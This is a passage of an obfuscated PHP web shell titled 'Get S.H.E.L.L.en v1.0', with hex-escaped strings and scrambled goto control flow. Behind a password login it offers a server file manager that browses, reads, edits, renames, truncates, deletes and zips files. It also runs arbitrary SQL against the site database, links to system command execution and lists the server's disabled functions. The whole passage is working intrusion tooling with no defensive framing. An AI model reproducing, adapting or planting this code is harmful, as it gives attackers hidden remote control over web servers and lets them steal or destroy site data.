urlencode(urlencode(shifrele($tableName))) . "\x27\51\x22\76" . htmlspecialchars($tableName) . "\x3c\x2f\141\x3e\74\142\162\x3e"; } print "\74\57\x64\151\x76\76"; print "\74\144\x69\166\x20\163\x74\171\154\x65\x3d\42\x66\x6c\x6f\x61\x74\72\x20\154\145\146\x74\73\x20\x70\141\144\x64\151\x6e\x67\55\154\x65\146\x74\x3a\40\x31\60\160\x78\x3b\40\167\151\144\x74\x68\x3a\x20\67\x35\x25\x3b\42\76"; if (isset($_POST["\x74"]) && is_string($_POST["\x74"]) && !empty($_POST["\x74"])) { $tableName = deshifrele(urldecode($_POST["\164"])); print "\x3c\x73\160\141\156\40\x63\154\141\163\x73\75\42\x71\x61\x6c\151\156\x22\x3e\124\x61\x62\154\x65\x3a\x3c\57\x73\160\141\156\x3e\x20" . htmlspecialchars($tableName) . "\40\50\x20\74\141\x20\150\x72\145\146\x3d\x22\x6a\141\166\x61\x73\143\162\151\x70\x74\72\163\145\150\x69\146\145\50\47\x3f\x6e\145\75\x73\x6b\x6c\137\144\137\x74\46\x74\75" . urlencode(urlencode(shifrele($tableName))) . "\x27\51\42\x3e\x44\x75\155\160\74\57\x61\x3e\x20\x29\74\x62\162\x3e"; $getColumns = $pdo->prepare("\x53\x45\x4c\x45\103\124\40\x63\x6f\x6c\x75\x6d\156\x5f\x6e\x61\155\x65\40\146\162\x6f\x6d\x20\x69\156\x66\157\162\x6d\141\x74\x69\x6f\156\x5f\x73\x63\150\x65\x6d\141\x2e\x63\157\x6c\165\x6d\x6e\x73\40\167\150\x65\x72\x65\40\164\141\142\x6c\145\x5f\163\x63\150\x65\x6d\x61\75\77\x20\141\156\x64\x20\164\141\x62\x6c\x65\x5f\156\x61\155\x65\x3d\x3f"); $getColumns->execute(array($baza, $tableName)); $columns = $getColumns->fetchAll(); if ($columns) { $dataCount = $pdo->query("\x53\x45\x4c\x45\x43\124\40\x63\157\165\156\164\50\x30\51\x20\101\x53\40\163\163\x20\x66\x72\157\155\40\140" . $tableName . "\140"); $dataCount = (int) $dataCount->fetchColumn(); print "\x3c\x73\x70\x61\x6e\x20\x63\x6c\x61\x73\163\x3d\42\x71\x61\154\x69\x6e\x22\x3e\103\157\165\x6e\x74\72\x3c\57\163\160\x61\156\x3e\x20" . $dataCount . "\74\x62\162\76\74\x62\162\x3e"; $pages = ceil($dataCount / 100); $currentPage = isset($_POST["\x73\x65\150\x69\x66\x65"]) && is_numeric($_POST["\x73\145\x68\151\x66\145"]) && $_POST["\x73\x65\150\x69\146\145"] >= 1 && $_POST["\x73\145\x68\x69\x66\x65"] <= $pages ? (int) $_POST["\x73\145\x68\x69\146\x65"] : 1; for ($p = 1; $p <= $pages; $p++) { print "\x3c\141\x20\x73\164\x79\154\145\75\42" . ($currentPage == $p ? "\142\x61\x63\x6b\x67\x72\x6f\165\156\x64\72\40\43\x34\x34\64\73" : '') . "\x6d\141\x72\147\x69\x6e\55\x6c\145\x66\164\x3a\x20\62\160\x78\x3b\x20\155\141\162\147\x69\x6e\x2d\x62\x6f\x74\164\157\155\72\40\x35\160\170\x3b\x20\160\x61\144\x64\x69\x6e\x67\x3a\40\62\160\x78\x20\x36\x70\x78\x3b\x20\142\x6f\162\x64\145\162\x3a\x20\61\x70\170\x20\163\157\154\151\x64\40\43\101\103\102\x37\65\64\x3b\40\164\145\170\x74\x2d\x64\145\143\157\162\141\x74\151\x6f\x6e\x3a\x20\x6e\x6f\x6e\x65\73\42\x20\150\x72\x65\146\75\42\152\x61\166\x61\163\143\x72\x69\160\x74\x3a\163\x65\150\151\146\145\x28\47\77\x6e\145\x3d\163\x6b\x6c\46\164\x3d" . urlencode(urlencode(shifrele($tableName))) . "\46\163\145\150\x69\146\x65\75" . $p . "\47\51\x3b\42\x3e" . $p . "\x3c\57\141\x3e\x20"; } print "\x3c\x62\x72\76\74\x62\x72\x3e"; $start = 100 * ($currentPage - 1); $data = $pdo->query("\123\105\x4c\x45\x43\124\x20\52\40\106\x52\117\115\40\140" . $tableName . "\140\x20\x4c\x49\x4d\111\124\40" . $start . "\x20\54\40\x31\60\x30"); $data = $data->fetchAll(); print "\74\x74\141\x62\x6c\145\76\74\x74\150\145\141\x64\x3e"; foreach ($columns as $columnInf) { print "\x3c\164\x68\76" . htmlspecialchars($columnInf["\143\x6f\154\x75\155\156\137\156\x61\155\x65"]) . "\74\x2f\x74\x68\x3e"; } print "\x3c\57\x74\150\145\141\x64\x3e\x3c\164\142\157\x64\171\x3e"; foreach ($data as $row) { print "\x3c\x74\162\x3e"; foreach ($row as $key => $val) { print "\74\x74\144\76\x3c\144\x69\166\x3e" . $val . "\74\57\144\x69\x76\76\x3c\57\164\144\x3e"; } print "\x3c\x2f\x74\x72\76"; } print "\74\x2f\164\x72\x3e\74\x2f\164\142\157\x64\x79\x3e\74\x2f\x74\141\142\x6c\x65\76"; } else { print "\124\141\x62\x6c\145\x20\x6e\x6f\164\x20\x66\x6f\165\156\144\41"; } } else { if (isset($_POST["\x65\x6d\x72"]) && is_string($_POST["\x65\x6d\x72"]) && !empty($_POST["\x65\x6d\x72"])) { $emr = deshifrele(urldecode($_POST["\x65\x6d\x72"])); print "\x3c\163\x70\x61\x6e\x20\143\x6c\x61\x73\x73\x3d\x22\161\x61\x6c\x69\156\42\x3e\x53\x51\x4c\x20\x65\155\162\72\x3c\57\163\x70\x61\x6e\76\40" . htmlspecialchars($emr) . "\74\x62\x72\76"; $data = $pdo->query($emr); $data = $data->fetchAll(); print "\74\164\x61\x62\154\x65\x3e\74\164\150\x65\141\x64\76"; if (count($data) > 0) { print "\x3c\x74\162\x3e"; foreach ($data[0] as $key => $val) { print "\74\164\150\x3e\x3c\144\151\x76\76" . $key . "\x3c\x2f\144\151\166\x3e\74\x2f\164\x68\76"; } print "\x3c\x2f\164\162\x3e"; } print "\74\57\164\150\145\x61\144\x3e\x3c\x74\x62\x6f\x64\x79\x3e"; foreach ($data as $row) { print "\74\164\162\x3e"; foreach ($row as $key => $val) { print "\x3c\x74\x64\x3e\x3c\144\151\x76\x3e" . $val . "\x3c\x2f\x64\x69\x76\76\74\57\x74\x64\76"; } print "\74\57\x74\x72\x3e"; } print "\74\x2f\164\x72\x3e\74\x2f\x74\x62\x6f\x64\171\x3e\74\x2f\164\141\x62\x6c\x65\76"; } } print "\x3c\x64\151\166\x3e\x3c\164\145\170\164\141\162\145\141\x20\x69\144\x3d\42\163\153\154\137\145\155\162\x22\76\74\57\x74\x65\170\x74\141\x72\x65\x61\76\x3c\142\165\x74\x74\157\156\40\164\x79\160\x65\75\42\142\x75\x74\164\157\156\42\x20\x6f\156\143\154\151\x63\x6b\75\x22\163\x6b\x6c\137\x62\x61\163\50\51\73\42\x3e\102\x61\163\40\x6d\145\x6e\145\74\57\x62\x75\x74\x74\157\x6e\76\x3c\x2f\x64\151\166\76"; print "\x3c\x2f\x64\x69\166\x3e"; print "\x3c\x64\151\166\40\163\x74\x79\154\145\75\x22\143\x6c\145\141\162\72\40\142\157\x74\150\73\42\x3e\x3c\x2f\x64\x69\166\76"; } } catch (Exception $e) { print $e->getMessage(); } } } else { if ($ne == "\x66\x61\x79\154\x5f\162\145\144\141\x6b\164\x65" && isset($_POST["\x66\x61\171\x6c"]) && '' != trim($_POST["\146\141\171\x6c"])) { $faylAdi = basename(deshifrele(urldecode(urldecode($_POST["\x66\x61\171\x6c"])))); $ayirici = substr($default_dir, strlen($default_dir) - 1) != "\x2f" && substr($faylAdi, 0, 1) != "\x2f" ? "\57" : ''; if (is_file($default_dir . $ayirici . $faylAdi) && is_readable($default_dir . $ayirici . $faylAdi)) { $status = ''; if (isset($_POST["\143\x6f\x6e\x74\x65\156\x74"]) && isset($_POST["\x74\157\x6f\x6b"]) && $_POST["\164\x6f\x6f\x6b"] != '' && isset($_SESSION["\x79\163\x5f\164\x6f\x6f\x6b"]) && $_SESSION["\x79\x73\x5f\164\x6f\157\x6b"] == $_POST["\164\157\x6f\153"] && is_writeable($default_dir . $ayirici . $faylAdi)) { unset($_SESSION["\x79\163\x5f\x74\157\157\x6b"]); $content = $_POST["\143\157\x6e\164\x65\x6e\164"]; $cc = array("\141", "\x69", "\145", "\x73", "\x6c", "\x62", "\x75", "\157", "\x70", "\150", "\x28", "\51", "\x3c", "\76", "\77", "\x3b", "\x5b", "\x5d", "\x24"); foreach ($cc as $k1 => $v1) { $content = str_replace("\x7c\72" . $k1 . "\72\x7c", $v1, $content); } $faylAch = fopen($default_dir . $ayirici . $faylAdi, "\167\53"); fwrite($faylAch, $content); fclose($faylAch); $status = "\x20\74\x73\160\x61\156\40\x63\x6c\x61\x73\x73\75\47\x71\141\154\151\156\47\x3e\x55\x26\x23\x32\x38\67\73\x75\x72\154\x61\x20\x79\x61\144\144\141\x20\163\x61\170\x6c\141\156\46\43\x33\x30\65\x3b\154\x64\x26\x23\x33\60\x35\x3b\41\x3c\57\163\x70\141\156\x3e"; } $oxuUrl = "\77\156\145\75\x66\x61\171\154\x5f\x6f\x78\165\x26\x66\141\171\154\x3d" . urlencode(urlencode(shifrele($faylAdi))) . "\46\x71\x6f\166\154\x75\161\x3d" . urlencode(urlencode(shifrele($default_dir))); $elaveBtn = is_writeable($default_dir . $ayirici . $faylAdi) ? '' : "\40\144\x69\163\141\x62\154\x65\x64"; print "\x3c\144\x69\166\x3e\106\141\171\x6c\40\141\144\x26\43\63\60\65\73\72\x20\74\x61\40\143\x6c\141\163\x73\x3d\x27\x71\141\x6c\x69\156\x27\40\x68\162\x65\x66\75\47\x6a\x61\166\x61\x73\x63\x72\151\160\164\x3a\x73\145\150\151\146\x65\x28\x22{$oxuUrl}\x22\x29\47\x3e" . htmlspecialchars($faylAdi) . "\74\x2f\141\x3e\x3c\x62\162\x2f\76\74\x66\157\x72\x6d\x20\x6d\145\x74\150\x6f\x64\75\x27\x50\117\123\x54\47\x20\x73\x74\171\x6c\x65\x3d\x27\x70\x61\x64\x64\151\x6e\x67\72\40\x30\x3b\40\155\x61\x72\147\x69\156\72\40\60\x3b\47\76\74\142\165\x74\x74\157\156\x20\x74\x79\x70\145\75\47\x73\x75\x62\x6d\x69\x74\47\x20\x63\x6c\141\163\163\x3d\x27\142\164\x6e\47{$elaveBtn}\76\x20\x59\141\144\144\x61\40\x73\x61\170\154\141\x20\x3c\57\142\x75\164\164\157\x6e\76\40\74\x62\165\x74\x74\157\156\40\x74\x79\x70\145\75\47\142\x75\x74\x74\x6f\156\x27\40\x6f\156\x63\x6c\151\x63\153\75\x27\163\x68\151\x66\x72\x65\x6c\145\x65\x28\x29\x27\76\x20\x53\x68\x69\x66\162\145\x6c\x65\40\x61\164\x61\163\150\40\x3c\x2f\x62\165\164\164\x6f\156\76\x20{$status}\74\x2f\144\151\x76\x3e"; print "\74\x69\x6e\160\165\x74\40\164\171\160\x65\75\47\x68\x69\x64\x64\145\156\47\x20\x76\141\x6c\165\145\x3d\x27\x66\x61\x79\154\x5f\162\145\x64\141\x6b\164\145\x27\40\156\x61\155\145\75\x27\x6e\x65\47\x3e\74\151\156\x70\165\164\40\164\x79\x70\145\75\x27\x68\151\x64\144\x65\156\47\40\x76\x61\154\165\145\x3d\47" . shifrele($faylAdi) . "\x27\40\156\x61\155\145\x3d\x27\x66\141\171\154\x27\x3e\74\x69\x6e\160\x75\x74\x20\x74\171\x70\x65\x3d\47\x68\151\x64\x64\145\156\47\x20\166\x61\x6c\x75\x65\x3d\x27" . urlencode(shifrele($default_dir)) . "\x27\40\156\x61\x6d\145\x3d\47\x71\x6f\166\154\165\161\x27\76\74\x69\x6e\x70\165\164\40\164\171\160\145\75\47\150\151\x64\144\145\156\x27\x20\x76\x61\x6c\165\145\75\47" . tookYarat("\x79\163\137\x74\157\157\153") . "\47\40\x6e\x61\x6d\x65\x3d\x27\x74\157\x6f\x6b\x27\x3e\74\x74\x65\x78\x74\141\x72\x65\141\40\x6e\141\155\145\x3d\x27\143\x6f\x6e\164\145\156\164\47\x20\143\x6c\141\x73\163\x3d\x27\x66\151\x6c\x65\x5f\145\x64\x69\164\47\76" . htmlspecialchars(file_get_contents($default_dir . $ayirici . $faylAdi)) . "\x3c\57\164\x65\170\x74\141\162\x65\x61\x3e\x3c\x2f\146\x6f\x72\155\76"; } else { print "\105\x72\162\x6f\162\x21\40" . htmlspecialchars($default_dir . $ayirici . $faylAdi); } } else { if (is_dir($default_dir)) { if (is_readable($default_dir)) { $qovluqIchi = scandir($default_dir); foreach ($qovluqIchi as &$emelemnt) { $ayirici = substr($default_dir, strlen($default_dir) - 1) != "\57" && substr($emelemnt, 0, 1) != "\57" ? "\57" : ''; if (is_dir($default_dir . $ayirici . $emelemnt)) { $emelemnt = "\60" . $emelemnt; } else { $emelemnt = "\61" . $emelemnt; } } asort($qovluqIchi); print "\x3c\x74\141\142\x6c\145\x20\143\x6c\x61\x73\x73\x3d\x27\x66\x4d\x61\x6e\141\147\145\162\47\40\163\x74\x79\154\x65\x3d\x27\167\151\144\164\x68\72\40\61\60\60\45\73\x27\76\x3c\x74\150\x65\141\x64\x3e\x3c\x74\x72\x20\x63\x6c\x61\163\163\75\47\x71\141\154\151\156\x27\x3e\74\x74\x68\x3e\163\74\57\x74\x68\x3e\x3c\164\x68\x3e\106\x61\171\x6c\74\x2f\164\x68\76\x3c\164\150\76\123\x69\172\145\x3c\x2f\164\150\76\x3c\x74\x68\x3e\x54\141\162\151\x78\74\57\x74\150\x3e\74\x74\x68\x3e\117\x77\156\145\162\57\107\162\157\165\160\x3c\x2f\x74\150\x3e\x3c\164\x68\76\x50\x65\162\155\x69\163\163\x69\157\156\x73\74\57\164\x68\x3e\74\x74\150\x3e\101\143\x74\x69\157\156\x73\74\x2f\x74\150\76\x3c\57\164\162\x3e\74\x2f\x74\150\145\x61\144\x3e\74\x74\142\x6f\x64\x79\x3e"; foreach ($qovluqIchi as $element) { $url = ''; $element = substr($element, 1); $faylAdiTam = $default_dir . $ayirici . $element; $ayirici = substr($default_dir, strlen($default_dir) - 1) != "\57" && substr($element, 0, 1) != "\57" ? "\57" : ''; $adi = is_dir($faylAdiTam) ? "\x5b\40{$element}\40\135" : $element; $classN = ''; if (is_dir($faylAdiTam)) { if ($element == "\x2e") { $url = "\x3f\161\157\x76\x6c\x75\161\75" . urlencode(urlencode(shifrele($default_dir))); } else { if ($element == "\x2e\56") { $yeniUrl = explode("\57", $default_dir); foreach (array_reverse($yeniUrl) as $j => $qq) { if (trim($qq) != '') { unset($yeniUrl[count($yeniUrl) - $j - 1]); break; } } $url = "\77\x71\157\166\154\165\x71\x3d" . urlencode(urlencode(shifrele(implode("\57", $yeniUrl)))); } else { $url = "\x3f\161\157\x76\x6c\x75\x71\x3d" . urlencode(urlencode(shifrele($faylAdiTam))); } } $classN = "\40\x73\164\x79\x6c\x65\x3d\x27\x66\x6f\x6e\x74\55\x77\145\151\147\150\x74\x3a\x20\66\x30\x30\73\x27"; } else { $url = "\77\x6e\x65\x3d\146\x61\171\x6c\x5f\157\170\165\46\146\141\171\154\x3d" . urlencode(urlencode(shifrele($element))) . "\46\x71\x6f\x76\x6c\165\161\75" . urlencode(urlencode(shifrele($default_dir))); } $fayldi = is_file($faylAdiTam); $isReadableColor = is_readable($faylAdiTam) && is_writeable($faylAdiTam); print "\74\x74\162\76\12\x9\x9\x9\11\11\11\x3c\x74\144\x3e\x3c\57\x74\144\76\xa\11\11\11\x9\11\x9\x3c\x74\x64\x3e\74\x61\x20\x68\x72\145\x66\75\42\x6a\141\x76\x61\163\x63\162\x69\160\164\x3a\x73\145\150\151\x66\x65\50\47" . $url . "\47\x29\42" . $classN . "\x3e" . htmlspecialchars($adi) . "\x3c\x2f\x61\76\x3c\57\164\144\x3e\12\11\11\11\x9\x9\11\74\x74\x64\x3e" . ($fayldi ? sizeFormat(filesize($faylAdiTam)) : '') . "\x3c\57\x74\x64\x3e\xa\x9\x9\x9\x9\11\11\74\x74\x64\x3e" . date("\144\x20\115\x20\131\54\40\x48\72\151", filectime($faylAdiTam)) . "\74\x2f\164\144\76\12\x9\x9\11\x9\11\11\x3c\x74\144\x3e" . htmlspecialchars(fileowner($faylAdiTam)) . "\x3c\57\x74\144\x3e\12\x9\11\11\11\11\11\74\x74\144" . ($isReadableColor ? "\40\x73\x74\171\154\145\75\x22\x63\x6f\154\157\x72\x3a\40\147\162\145\145\156\x3b\x22" : '') . "\x3e" . substr(sprintf("\45\x6f", fileperms($faylAdiTam)), -4) . "\74\57\x74\144\x3e\12\11\11\11\11\11\11\x3c\164\x64\76"; if (is_file($faylAdiTam)) { print "\40\74\x61\40\x68\162\145\x66\x3d\x22\152\141\166\x61\163\143\x72\151\160\x74\72\163\145\x68\151\x66\x65\x28\x27" . str_replace("\146\141\171\x6c\x5f\157\170\165", "\x66\x61\171\154\137\171\x75\153\154\145", $url) . "\x27\51\42" . $classN . "\x3e\104\157\167\x6e\154\x6f\141\144\x3c\57\141\x3e\x20\x7c\x20" . ("\40\74\x61\x20\x68\162\145\x66\75\x22\152\x61\166\x61\x73\x63\x72\x69\160\164\x3a\x63\150\x61\156\147\x65\x46\x69\154\145\116\x61\155\145\50\47" . htmlspecialchars($adi) . "\x27\40\54\40\47" . str_replace("\x66\x61\x79\x6c\137\x6f\x78\x75", "\146\141\171\x6c\x5f\141\x64\x5f\144\145\x79\x69\163\x68", $url) . "\47\51\x3b\x22" . $classN . "\76\122\x65\156\x61\155\x65\74\x2f\x61\x3e\x20\174\x20") . ("\40\x3c\141\40\x68\x72\145\x66\x3d\x22\x6a\x61\166\141\163\x63\162\151\x70\164\x3a\146\141\x79\x6c\x53\x69\x66\151\x72\x6c\141\x28\47" . str_replace("\x66\141\x79\154\x5f\157\x78\165", "\x66\141\x79\x6c\137\163\151\x66\x69\x72\154\x61", $url) . "\x27\x29\73\x22" . $classN . "\x3e\124\x72\165\156\x63\x61\164\145\x3c\x2f\141\x3e\40\x7c\40") . ("\40\74\x61\40\x68\162\x65\146\x3d\42\152\141\x76\x61\163\143\x72\x69\x70\x74\72\x66\141\171\x6c\x53\x69\x6c\50\x27" . str_replace("\x66\x61\x79\154\137\x6f\170\x75", "\146\141\x79\154\x5f\163\151\x6c", $url) . "\x27\51\x22" . $classN . "\76\104\145\154\145\164\145\x3c\57\x61\76"); } else { if ($adi != "\x5b\x20\56\x20\135" && $adi != "\x5b\x20\56\x2e\40\x5d") { print "\x20\74\141\x20\150\162\x65\146\x3d\x22\x6a\x61\x76\141\163\143\162\x69\160\164\72\172\151\160\154\x65\50\x27" . urlencode(urlencode(shifrele($faylAdiTam))) . "\47\x29\x22" . $classN . "\x3e\132\x69\x70\x3c\x2f\x61\76\40\x7c\40" . ("\40\74\x61\x20\150\162\x65\146\x3d\42\152\141\166\x61\163\x63\x72\x69\160\164\x3a\x73\151\x6c\120\141\160\153\141\x28\47" . urlencode(urlencode(shifrele($faylAdiTam))) . "\47\x29\x22" . $classN . "\x3e\123\x69\x6c\74\x2f\x61\76"); } } print "\74\x2f\x74\x64\x3e\xa\11\x9\x9\11\x9\x3c\57\x74\x72\76"; } } else { print "\x3c\144\x69\166\40\x73\x74\171\154\145\75\x27\x6d\x61\162\147\x69\156\x3a\40\x31\60\160\x78\x20\60\160\170\x3b\x27\x20\x63\x6c\141\x73\163\x3d\47\161\x61\x6c\x69\x6e\x27\x3e\120\145\162\x6d\x69\163\163\151\157\x6e\x73\40\144\145\156\x69\144\145\x64\41\74\57\144\151\x76\76"; } } } } } } } goto UH836; mA406: $safeMode = true; goto fh9Qj; D47te: print "\x3c\x73\x70\141\x6e\40\x63\154\141\x73\163\75\x27\x71\141\x6c\151\156\47\x3e\104\x69\163\141\x62\154\145\40\146\x75\x6e\143\x74\151\x6f\156\163\x3a\x3c\x2f\163\x70\x61\x6e\76\40" . (implode("\x2c\40", $baqliFunksiyalar) == '' ? "\x3c\x73\160\141\x6e\40\x63\154\141\x73\x73\75\x27\163\x75\x63\143\x65\x73\x73\x27\x3e\171\x6f\x78\x64\x75\x20\x3a\51" : "\74\163\160\141\x6e\x20\143\154\141\163\x73\x3d\x27\x62\x61\x64\47\x3e" . implode("\54\x20", $baqliFunksiyalar)) . "\74\x2f\163\160\x61\156\x3e\74\142\x72\x2f\x3e"; goto Cd3Vj; ygUGz: ?>
<html><head><title>Get S.H.E.L.L.en v1.0 | BY ..</title><meta content="text/html; charset=utf-8"http-equiv="content-type"><style>body{background-color:#222;color:#d6d4d4;font-family:Lucida,Verdana;font-size:12px}.qalin{text-decoration:none;color:#d6905e;font-weight:600}.success{color:#9db754}.bad{color:#b75654}a{color:#acb754;text-decoration:none!important}.fManager,.fManager tbody,.fManager tr{padding:0;border-collapse:collapse;margin:0;font-size:12px}.fManager{margin:10px 0}.fManager tbody tr:nth-child(2n+1){background:#331717}.fManager tbody tr:nth-child(2n){background:#1c0c0c}.fManager tbody tr:hover{background:#000}.fManager thead th{text-align:left}.fManager thead tr{background-color:#333}.fManager{box-shadow:1px 1px 1px 1px #333}.fManager thead th{padding:4px 3px}.fayl_oxu{margin:5px 0;padding:2px;box-shadow:1px 1px 1px 1px #333;background-color:#e1e1e1;width:100%;height:400px;overflow:auto}.btn{border:1px solid #acae40;background-color:#223b3b;color:#e1e1e1;padding:1px 10px;cursor:pointer}.btn:disabled{border:1px solid #848484;color:#848484;cursor:not-allowed}.file_edit{margin:5px 0;padding:2px;box-shadow:1px 1px 1px 1px #333;background-color:#e1e1e1;width:100%;height:400px;overflow:auto}input,select,textarea{background:0 0!important;color:#f6a56d;border:1px solid #d6905e;padding:5px}table td{border:1px solid rgba(214,144,94,.7);min-width:20px;padding-left:5px;padding-right:5px;max-width:500px;color:#ffad6f;background:#292929}table th{border:1px solid #d6905e;padding-left:5px;padding-right:5px;color:#ffad6f}table td div{overflow:auto;width:100%;height:100%;max-height:100px}</style></head><body><?php  goto RFMY1; zZMdU: if (isset($_POST["\161\x6f\166\154\x75\161"]) && is_string($_POST["\161\157\166\x6c\165\161"])) { $default_dir = empty($_POST["\x71\157\166\x6c\x75\161"]) ? DIRECTORY_SEPARATOR : deshifrele(urldecode(urldecode($_POST["\161\157\x76\154\165\161"]))); $c_h_dir_comm = "\143" . "\x68\x64" . "\151\162"; $c_h_dir_comm($default_dir); } goto DxbeC; DxbeC: $default_dir = str_replace("\134", "\x2f", $default_dir); goto U5wxj; KsmzR: session_start(); goto ORf1s; o0obI: function rrmdir($dir) { if (is_dir($dir)) { $objects = scandir($dir); foreach ($objects as $object) { if ($object != "\x2e" && $object != "\x2e\56") { if (is_dir($dir . "\57" . $object)) { rrmdir($dir . "\x2f" . $object); } else { unlink($dir . "\57" . $object); } } } rmdir($dir); } } goto Pezo2; rrIO4: echo urlencode(urlencode(shifrele($default_dir))); goto chF3P; XSSO7: ?>
<hr><a href="javascript:newFile();">Yeni fayl</a> | <a href="javascript:newPapka();">Yeni papka</a><br><a href="javascript:sehife('?ne=sistem_kom&qovluq=<?php  goto rrIO4; Xzy7l: if (!isset($_SESSION["\141\x75\164\x68\145\x6e\164\151\143\x61\164\x65\144"]) || $_SESSION["\x61\165\x74\150\145\156\x74\x69\143\x61\x74\x65\x64"] !== true) { if (isset($_POST["\160\141\x73\163\x77\x6f\x72\144"]) && $_POST["\x70\x61\x73\x73\167\x6f\162\x64"] === $password) { $_SESSION["\141\165\164\x68\x65\156\164\x69\x63\x61\164\x65\x64"] = true; echo "\74\163\x74\x79\x6c\x65\x3e\xa\x20\x20\x20\40\x20\x20\x20\40\x20\x20\40\40\x20\40\40\40\100\153\x65\171\146\x72\x61\155\x65\x73\x20\x66\x61\144\x65\x49\x6e\40\173\12\40\x20\40\40\x20\40\40\40\40\x20\x20\40\40\40\40\x20\x20\x20\40\x20\146\162\x6f\x6d\40\x7b\x20\x6f\x70\141\143\x69\x74\171\72\40\x30\x3b\40\x7d\xa\x20\40\40\40\x20\x20\x20\x20\40\x20\x20\40\40\x20\40\x20\x20\x20\40\x20\x74\157\40\x7b\x20\157\160\141\143\151\164\x79\72\40\x31\x3b\40\x7d\12\40\x20\x20\40\x20\x20\40\x20\x20\40\40\x20\x20\40\x20\x20\x7d\12\x20\x20\40\x20\x20\40\40\40\x20\x20\x20\x20\40\40\40\40\xa\40\x20\40\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\150\x32\40\173\xa\x20\x20\40\x20\x20\40\x20\x20\40\40\x20\40\x20\40\40\40\40\40\40\x20\141\x6e\x69\155\141\164\x69\157\x6e\72\x20\146\x61\144\x65\x49\156\x20\x32\x73\40\154\151\x6e\145\141\162\73\xa\40\40\40\x20\x20\x20\40\x20\40\x20\40\x20\x20\40\x20\x20\175\xa\40\x20\x20\40\40\x20\x20\x20\x20\x20\x20\40\x20\40\74\x2f\x73\164\171\154\145\76"; } echo "\xa\40\x20\40\x20\x3c\163\164\x79\x6c\x65\76\xa\40\x20\x20\x20\x20\40\40\40\x62\x6f\x64\171\40\173\xa\x20\40\x20\x20\40\40\x20\40\x20\x20\x20\40\142\x61\143\153\147\x72\x6f\165\x6e\x64\55\x69\155\141\x67\145\x3a\x20\165\x72\x6c\50\x22\x68\x74\164\160\163\72\x2f\57\167\x30\56\x70\x65\141\x6b\x70\x78\56\143\157\155\57\167\x61\x6c\x6c\160\x61\160\145\162\x2f\61\70\70\x2f\x37\64\x35\57\x48\x44\x2d\x77\141\x6c\154\160\x61\160\x65\162\55\x74\157\x6d\x6f\162\x69\55\156\x61\157\55\x61\x6e\151\x6d\x65\55\x63\150\141\x72\154\x6f\164\x74\145\x2d\x6f\164\141\153\x75\56\152\x70\x67\x22\51\x3b\xa\x20\40\40\40\x20\40\40\40\40\40\x20\40\142\141\143\153\147\162\x6f\x75\x6e\x64\55\x73\151\x7a\145\x3a\40\x63\x6f\x76\x65\162\73\xa\x20\40\x20\40\40\x20\40\40\40\x20\x20\40\x62\141\x63\x6b\147\162\x6f\x75\156\144\x2d\160\157\163\x69\164\151\157\x6e\x3a\40\x63\x65\156\164\145\162\73\xa\x20\40\x20\40\x20\x20\x20\40\x20\40\x20\40\142\141\143\153\147\162\157\165\156\144\55\x72\x65\160\x65\x61\164\x3a\40\x6e\157\x2d\x72\145\160\x65\141\x74\x3b\xa\x20\40\x20\x20\40\x20\40\40\x20\x20\40\40\144\151\x73\160\154\141\x79\x3a\x20\x66\154\145\170\73\12\40\40\40\x20\x20\40\x20\x20\40\x20\x20\40\152\x75\163\164\151\x66\171\x2d\143\157\x6e\164\145\156\164\72\x20\x63\x65\156\164\145\162\73\12\40\40\x20\40\40\x20\x20\x20\40\40\x20\x20\141\154\x69\147\x6e\x2d\x69\x74\x65\x6d\x73\72\40\x63\145\x6e\164\145\162\x3b\12\40\x20\40\40\40\x20\x20\x20\x20\40\x20\x20\x6d\151\156\55\x68\x65\151\147\x68\x74\72\40\x31\x30\60\x76\x68\73\xa\x20\40\x20\x20\x20\x20\x20\x20\x7d\12\40\x20\x20\40\40\40\x20\40\xa\40\40\x20\x20\40\40\40\40\x66\157\x72\155\40\173\xa\40\x20\40\x20\40\40\40\40\x20\x20\x20\40\144\x69\x73\x70\154\141\171\72\x20\x66\x6c\x65\x78\x3b\12\x20\x20\x20\x20\x20\x20\40\40\40\40\x20\x20\146\x6c\145\170\55\x64\x69\x72\145\143\164\x69\x6f\156\72\40\143\157\x6c\165\155\x6e\73\xa\x20\x20\x20\x20\x20\40\40\40\40\x20\x20\40\x61\x6c\x69\147\156\x2d\151\164\x65\155\x73\x3a\x20\x63\145\156\x74\x65\162\73\12\x20\40\x20\40\x20\40\40\x20\40\x20\x20\x20\142\x61\x63\153\147\x72\x6f\x75\x6e\144\55\143\x6f\x6c\x6f\x72\72\40\162\147\142\x61\x28\x32\65\65\54\40\62\x35\x35\x2c\40\x32\65\65\54\40\60\56\70\51\73\xa\40\40\40\40\40\x20\40\40\40\x20\x20\40\160\x61\144\144\x69\156\x67\x3a\40\x32\60\160\x78\x3b\xa\40\40\x20\x20\x20\40\x20\x20\x20\x20\40\40\142\x6f\x72\x64\x65\162\x2d\x72\141\144\x69\x75\163\72\x20\61\60\x70\x78\x3b\12\x20\x20\x20\40\x20\40\40\x20\175\12\x20\x20\x20\40\x20\40\x20\40\xa\40\x20\40\40\40\x20\40\x20\150\62\40\173\xa\40\40\40\40\x20\40\x20\40\40\40\x20\x20\141\156\x69\155\141\164\151\x6f\156\x2d\144\x75\162\141\x74\151\157\x6e\x3a\40\62\163\73\12\40\40\x20\40\x20\40\40\x20\40\x20\x20\x20\x61\x6e\x69\x6d\x61\x74\151\x6f\156\55\151\x74\x65\x72\x61\164\151\157\156\x2d\x63\157\165\156\164\72\40\x69\156\x66\151\x6e\151\x74\x65\73\12\x20\40\x20\x20\x20\40\x20\40\x20\x20\40\x20\141\x6e\151\155\x61\164\151\x6f\156\55\156\x61\x6d\x65\x3a\40\147\154\x6f\x77\151\156\147\x3b\xa\x20\40\x20\40\40\x20\40\40\x20\40\40\x20\x63\157\x6c\157\162\72\40\142\154\141\x63\x6b\x3b\x20\x2f\x2a\40\127\x61\x72\x6e\141\x20\x74\145\x6b\x73\x20\150\x69\x74\141\x6d\40\x2a\x2f\12\x20\40\x20\40\x20\x20\40\40\x7d\12\40\40\x20\40\40\40\40\40\12\x20\40\40\40\x20\40\x20\x20\x40\153\145\171\x66\162\141\x6d\145\x73\x20\147\x6c\157\167\x69\x6e\147\40\173\12\40\40\x20\40\40\40\40\40\x20\x20\40\x20\x30\45\40\173\40\x63\x6f\x6c\x6f\162\72\x20\167\150\x69\164\x65\73\x20\164\x65\x78\164\x2d\x73\x68\x61\144\x6f\167\72\x20\60\40\60\x20\61\60\160\170\x20\x23\146\146\x66\73\40\175\12\x20\x20\40\x20\40\40\x20\x20\40\40\40\40\x35\60\x25